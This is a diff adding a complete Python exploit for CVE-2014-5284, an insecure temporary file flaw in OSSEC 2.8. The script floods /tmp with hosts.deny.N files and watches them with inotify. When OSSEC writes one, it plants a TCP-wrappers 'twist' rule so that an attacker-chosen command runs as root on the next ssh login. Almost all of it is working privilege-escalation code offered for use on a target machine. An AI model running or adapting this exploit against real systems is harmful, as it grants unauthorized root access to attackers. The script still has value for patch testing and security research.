|
| 1 | +#!/usr/bin/python |
| 2 | +# Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation |
| 3 | +# Date: 14-11-14 |
| 4 | +# Exploit Author: skynet-13 |
| 5 | +# Vendor Homepage: www.ossec.net/ |
| 6 | +# Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz |
| 7 | +# Version: OSSEC - 2.8 |
| 8 | +# Tested on: Ubunutu x86_64 |
| 9 | +# CVE : 2014-5284 |
| 10 | + |
| 11 | +# Created from Research by |
| 12 | +# Jeff Petersen |
| 13 | +# Roka Security LLC |
| 14 | + |
| 15 | +# Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1 |
| 16 | + |
| 17 | +# Run this on target machine and follow instructions to execute command as root |
| 18 | + |
| 19 | +from twisted.internet import inotify |
| 20 | +from twisted.python import filepath |
| 21 | +from twisted.internet import reactor |
| 22 | +import os |
| 23 | +import optparse |
| 24 | +import signal |
| 25 | + |
| 26 | + |
| 27 | +class HostDenyExploiter(object): |
| 28 | + |
| 29 | + def __init__(self, path_to_watch, cmd): |
| 30 | + self.path = path_to_watch |
| 31 | + self.notifier = inotify.INotify() |
| 32 | + self.exploit = cmd |
| 33 | + |
| 34 | + def create_files(self): |
| 35 | + print "==============================================" |
| 36 | + print "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..." |
| 37 | + |
| 38 | + for i in range(300, 65536): |
| 39 | + filename = "/tmp/hosts.deny.%s" % i |
| 40 | + f = open(filename, 'w') |
| 41 | + f.write("") |
| 42 | + f.close() |
| 43 | + |
| 44 | + def watch_files(self): |
| 45 | + print "==============================================" |
| 46 | + print "Monitoring tmp for file change...." |
| 47 | + print "ssh into the system a few times with an incorrect password" |
| 48 | + print "Then wait for up to 10 mins" |
| 49 | + print "==============================================" |
| 50 | + self.notifier.startReading() |
| 51 | + self.notifier.watch(filepath.FilePath(self.path), callbacks=[self.on_file_change]) |
| 52 | + |
| 53 | + def write_exploit_to_file(self, path): |
| 54 | + print 'Writing exploit to this file' |
| 55 | + f = open(str(path).split("'")[1], 'w') |
| 56 | + f.write(' sshd : ALL : twist %s \n' % self.exploit) |
| 57 | + f.close() |
| 58 | + print "==============================================" |
| 59 | + print " ssh in again to execute the command" |
| 60 | + print "==============================================" |
| 61 | + print " End Prog." |
| 62 | + os.kill(os.getpid(), signal.SIGUSR1) |
| 63 | + |
| 64 | + def on_file_change(self, watch, path, mask): |
| 65 | + print 'File: ', str(path).split("'")[1], ' has just been modified' |
| 66 | + self.notifier.stopReading() |
| 67 | + self.write_exploit_to_file(path) |
| 68 | + |
| 69 | + |
| 70 | +if __name__ == '__main__': |
| 71 | + parser = optparse.OptionParser("usage of program \n" + "-c Command to run as root in quotes\n") |
| 72 | + parser.add_option('-c', dest='cmd', type='string', help='Used to specify a command to run as root') |
| 73 | + (options, args) = parser.parse_args() |
| 74 | + cmd = options.cmd |
| 75 | + if options.cmd is None: |
| 76 | + print parser.usage |
| 77 | + exit(0) |
| 78 | + ex = HostDenyExploiter('/tmp', cmd) |
| 79 | + ex.create_files() |
| 80 | + ex.watch_files() |
| 81 | + reactor.run() |
| 82 | + exit(0) |
0 commit comments